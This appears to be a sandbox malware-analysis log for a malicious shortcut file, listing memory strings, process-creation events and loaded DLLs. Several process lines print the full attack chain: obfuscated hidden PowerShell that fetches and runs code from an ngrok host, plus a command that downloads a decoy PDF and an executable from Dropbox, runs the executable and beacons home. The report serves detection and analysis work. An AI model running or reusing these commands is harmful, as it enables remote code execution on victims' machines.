Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT DISTINCT ContainerID FROM ObjectDirTAB Where ObjectID IN (SELECT FatherID FROM ObjectDirTAB WHERE ContainerID = %u);
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u AND ContainerID <> ObjectID;
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE FatherID IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u);
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name, %d+18,10) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#0,%Q);
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence';
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT %s FROM %s WHERE %s = %u OR %s = %u OR %s = %u or %s = %u;
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT ContainerID FROM ObjectDirTAB WHERE ObjectID = %u;
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT ContainerID FROM ObjectDirTAB WHERE ObjectID = %u;SELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE ObjectID IN (SELECT ObjectID FROM CrossRefTAB WHERE TargetObject IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u)) AND ContainerID != %uSELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE ObjectID IN (SELECT ObjectID FROM ObjectDirTAB WHERE FatherID = %u)SELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE ObjectID IN (SELECT TargetObject FROM CrossRefTAB Where ObjectID IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u)) AND ContainerID != %uSELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE FatherID IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u);SELECT DISTINCT ContainerID FROM ObjectDirTAB Where ObjectID IN (SELECT FatherID FROM ObjectDirTAB WHERE ContainerID = %u);DirectoryIDDirectoryTABSCCStatusSCCStatusAttributesSELECT %s FROM %s WHERE %s = %u OR %s = %u OR %s = %u or %s = %u;FatTABSCCStatusDataSELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u AND ContainerID <> ObjectID;Property(%uClass(MetaDataItemRemovedEventMetaDataItemAddedEventMetaDataCreatedEventMetaData

Source: pkqLAMAv96.lnk

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2060,i,3314031829294604872,3395366373032741599,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\39750847.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6680 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\39350554-cb9f-4577-be49-6b699e44992e.pdf
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7324 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7992 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:6
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1452,i,12575340364817014389,13679646313272549984,262144 /prefetch:3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6660 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Process created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe"
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8692 -s 424
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\fontdrvhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5884 -s 136
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\39750847.bat" "	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2060,i,3314031829294604872,3395366373032741599,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6680 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7324 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7992 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:6	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6660 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\39350554-cb9f-4577-be49-6b699e44992e.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1452,i,12575340364817014389,13679646313272549984,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Process created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe"
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
